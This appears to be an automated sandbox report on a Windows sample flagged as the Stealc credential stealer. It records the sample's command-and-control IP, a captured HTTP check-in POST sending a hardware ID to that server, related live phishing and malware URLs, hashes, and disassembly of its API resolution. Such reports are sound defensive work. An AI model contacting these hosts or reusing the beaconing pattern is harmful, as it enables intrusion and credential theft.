                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/0 | file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.phpN | file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206/6c4adf523b719729.phpz | file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.phpfh | file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1546478
                                  Start date and time:2024-11-01 00:37:05 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 15s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 133
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe
                                  No simulations
Match: 185.215.113.206
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/746f34465cf17784/sqlite3.dll
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
ykDoK8BtxW.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
Match: s-part-0015.t-0009.t-msedge.net
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
8FebOORbmE.vbs | Get hash | malicious | Unknown | Browse | 13.107.246.43
https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1 | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.43
https://uslpsz.efkbkot.xyz/e7e68e62c/JV9-MXEwfF9fJSVeKl/8jaSp4fjVfMW/EzJV4vXiNeJHw9OXxufDBAZSp5YzkhdDNlZG8lN0AjJGd-fD8kIXJ8Kg2 | Get hash | malicious | Unknown | Browse | 13.107.246.43
https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM= | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.43
https://7654658765888767.azurefd.net/mt92C | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.43
https://massgrave.dev/get | Get hash | malicious | Unknown | Browse | 13.107.246.43
original.eml | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.43
https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1 | Get hash | malicious | Unknown | Browse | 13.107.246.43
Justificante de pago.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 13.107.246.43
ATTN1.html | Get hash | malicious | Unknown | Browse | 13.107.246.43
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
ykDoK8BtxW.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.957120921245521
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'123'776 bytes
                                  MD5:43deae52c429449144c488c4ea074c14
                                  SHA1:2496e112cf08e1584a15d65409d84936f3c8b7f9
                                  SHA256:bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf
                                  SHA512:f892ccc0112a9910bb1f8e391304890b1d2d8f77d7ab6428de2c6a8caa554ee979dcee531acc95944942914ed503a459f29691be24ae73cb440f3480a9969db5
                                  SSDEEP:49152:vYv5z1zDZeVTz5VTmmGkADB6bn9ImIO53GFgFgANX:o59udFmmvADBwim72
                                  TLSH:E8A5337647D902BDE24EB734EE89D759623AB32F8D58802733434A204D766B5C613E2F
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xb23000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007F0AD88835DAh
                                  cmovbe esp, dword ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | 326b19e60cbdb9983a52c3d01dd0e93e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x29c000 | 0x200 | bad0a9df75e7e545a1e0fe5d5145f590 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fozyxqhw | 0x586000 | 0x19c000 | 0x19b600 | 56938cc87a32374ca709f227834fb2eb | False | 0.9946884020814342 | data | 7.952608283646461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gnsdcfju | 0x722000 | 0x1000 | 0x600 | 42c6f017c58e68fd6e626fab97c0e87d | False | 0.5716145833333334 | data | 5.030145868258663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x723000 | 0x3000 | 0x2200 | c81fd016083f231de771a83e3646a7ed | False | 0.05526194852941176 | DOS executable (COM) | 0.7991046338905283 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-01T00:38:04.204405+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2024 00:38:02.984334946 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 1, 2024 00:38:02.990505934 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 1, 2024 00:38:02.990689993 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 1, 2024 00:38:02.990912914 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 1, 2024 00:38:02.997159958 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 1, 2024 00:38:03.905581951 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 1, 2024 00:38:03.905725002 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 1, 2024 00:38:03.914220095 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 1, 2024 00:38:03.920823097 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 1, 2024 00:38:04.204340935 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Nov 1, 2024 00:38:04.204405069 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Nov 1, 2024 00:38:07.867949009 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 1, 2024 00:38:13.958625078 CET | 1.1.1.1 | 192.168.2.5 | 0x7995 | No error (0) | shed.dual-low.s-part-0015.t-0009.t-msedge.net | s-part-0015.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 1, 2024 00:38:13.958625078 CET | 1.1.1.1 | 192.168.2.5 | 0x7995 | No error (0) | s-part-0015.t-0009.t-msedge.net | | 13.107.246.43 | A (IP address) | IN (0x0001) | false
                                  • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 4024 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 00:38:02.990912914 CET | 90 | OUT | GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
Nov 1, 2024 00:38:03.905581951 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Thu, 31 Oct 2024 23:38:03 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
Nov 1, 2024 00:38:03.914220095 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a
                                  Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--
Nov 1, 2024 00:38:04.204340935 CET | 210 | IN | HTTP/1.1 200 OK
                                  Date: Thu, 31 Oct 2024 23:38:04 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Target ID:0
                                  Start time:19:37:58
                                  Start date:31/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x680000
                                  File size:2'123'776 bytes
                                  MD5 hash:43DEAE52C429449144C488C4EA074C14
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:3.1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:2.9%
                                    Total number of Nodes:1327
                                    Total number of Limit Nodes:24
                                    execution_graph 37836 696c90 37881 6822a0 37836->37881 37860 696d04 37861 69acc0 4 API calls 37860->37861 37862 696d0b 37861->37862 37863 69acc0 4 API calls 37862->37863 37864 696d12 37863->37864 37865 69acc0 4 API calls 37864->37865 37866 696d19 37865->37866 37867 69acc0 4 API calls 37866->37867 37868 696d20 37867->37868 38033 69abb0 37868->38033 37870 696dac 38037 696bc0 GetSystemTime 37870->38037 37872 696d29 37872->37870 37874 696d62 OpenEventA 37872->37874 37875 696d79 37874->37875 37876 696d95 CloseHandle Sleep 37874->37876 37880 696d81 CreateEventA 37875->37880 37878 696daa 37876->37878 37878->37872 37879 696db6 CloseHandle ExitProcess 37880->37870 38234 684610 37881->38234 37883 6822b4 37884 684610 2 API calls 37883->37884 37885 6822cd 37884->37885 37886 684610 2 API calls 37885->37886 37887 6822e6 37886->37887 37888 684610 2 API calls 37887->37888 37889 6822ff 37888->37889 37890 684610 2 API calls 37889->37890 37891 682318 37890->37891 37892 684610 2 API calls 37891->37892 37893 682331 37892->37893 37894 684610 2 API calls 37893->37894 37895 68234a 37894->37895 37896 684610 2 API calls 37895->37896 37897 682363 37896->37897 37898 684610 2 API calls 37897->37898 37899 68237c 37898->37899 37900 684610 2 API calls 37899->37900 37901 682395 37900->37901 37902 684610 2 API calls 37901->37902 37903 6823ae 37902->37903 37904 684610 2 API calls 37903->37904 37905 6823c7 37904->37905 37906 684610 2 API calls 37905->37906 37907 6823e0 37906->37907 37908 684610 2 API calls 37907->37908 37909 6823f9 37908->37909 37910 684610 2 API calls 37909->37910 37911 682412 37910->37911 37912 684610 2 API calls 37911->37912 37913 68242b 37912->37913 37914 684610 2 API calls 37913->37914 37915 682444 37914->37915 37916 684610 2 API calls 37915->37916 37917 68245d 37916->37917 37918 684610 2 API calls 37917->37918 37919 682476 37918->37919 37920 684610 2 API calls 37919->37920 37921 68248f 37920->37921 37922 684610 2 API calls 37921->37922 37923 
39259->39257 39260->39238 39261->39178

                                    Control-flow Graph (rendered graph not reproduced; basic blocks 699bb0-699f12, resolving imports via GetProcAddress and LoadLibraryA)
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,01420660), ref: 00699BF1
                                    • GetProcAddress.KERNEL32(75900000,014206A8), ref: 00699C0A
                                    • GetProcAddress.KERNEL32(75900000,014207C8), ref: 00699C22
                                    • GetProcAddress.KERNEL32(75900000,014205B8), ref: 00699C3A
                                    • GetProcAddress.KERNEL32(75900000,014207E0), ref: 00699C53
                                    • GetProcAddress.KERNEL32(75900000,01429198), ref: 00699C6B
                                    • GetProcAddress.KERNEL32(75900000,01416840), ref: 00699C83
                                    • GetProcAddress.KERNEL32(75900000,01416940), ref: 00699C9C
                                    • GetProcAddress.KERNEL32(75900000,01420828), ref: 00699CB4
                                    • GetProcAddress.KERNEL32(75900000,014206C0), ref: 00699CCC
                                    • GetProcAddress.KERNEL32(75900000,01420648), ref: 00699CE5
                                    • GetProcAddress.KERNEL32(75900000,014207F8), ref: 00699CFD
                                    • GetProcAddress.KERNEL32(75900000,01416820), ref: 00699D15
                                    • GetProcAddress.KERNEL32(75900000,01420840), ref: 00699D2E
                                    • GetProcAddress.KERNEL32(75900000,01420570), ref: 00699D46
                                    • GetProcAddress.KERNEL32(75900000,014169C0), ref: 00699D5E
                                    • GetProcAddress.KERNEL32(75900000,01420588), ref: 00699D77
                                    • GetProcAddress.KERNEL32(75900000,014208D0), ref: 00699D8F
                                    • GetProcAddress.KERNEL32(75900000,01416A00), ref: 00699DA7
                                    • GetProcAddress.KERNEL32(75900000,01420858), ref: 00699DC0
                                    • GetProcAddress.KERNEL32(75900000,014169E0), ref: 00699DD8
                                    • LoadLibraryA.KERNEL32(014208E8,?,00696CA0), ref: 00699DEA
                                    • LoadLibraryA.KERNEL32(01420900,?,00696CA0), ref: 00699DFB
                                    • LoadLibraryA.KERNEL32(01420918,?,00696CA0), ref: 00699E0D
                                    • LoadLibraryA.KERNEL32(01420870,?,00696CA0), ref: 00699E1F
                                    • LoadLibraryA.KERNEL32(01420888,?,00696CA0), ref: 00699E30
                                    • GetProcAddress.KERNEL32(75070000,014208A0), ref: 00699E52
                                    • GetProcAddress.KERNEL32(75FD0000,014208B8), ref: 00699E73
                                    • GetProcAddress.KERNEL32(75FD0000,01429578), ref: 00699E8B
                                    • GetProcAddress.KERNEL32(75A50000,01429518), ref: 00699EAD
                                    • GetProcAddress.KERNEL32(74E50000,01416860), ref: 00699ECE
                                    • GetProcAddress.KERNEL32(76E80000,01429068), ref: 00699EEF
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00699F06
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00699EFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 898f0577568eb19f3667fb1c32df82860c70f53047aaa47105f2e0c0dea7be6c
                                    • Instruction ID: 6f8115ad5b996debd7fbf299fa22e98f4fc3afb03d63959ef2fc3be4c91be023
                                    • Opcode Fuzzy Hash: 898f0577568eb19f3667fb1c32df82860c70f53047aaa47105f2e0c0dea7be6c
                                    • Instruction Fuzzy Hash: 39A1FBB553C7009FC784DFEAFC88956BBB9A749703B50861AB919C3670D734AA40EF60

                                    Control-flow Graph (rendered graph not reproduced; basic blocks 684610-6847f9, RtlAllocateHeap followed by VirtualProtect)
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0068465F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 006847EC
                                    Strings
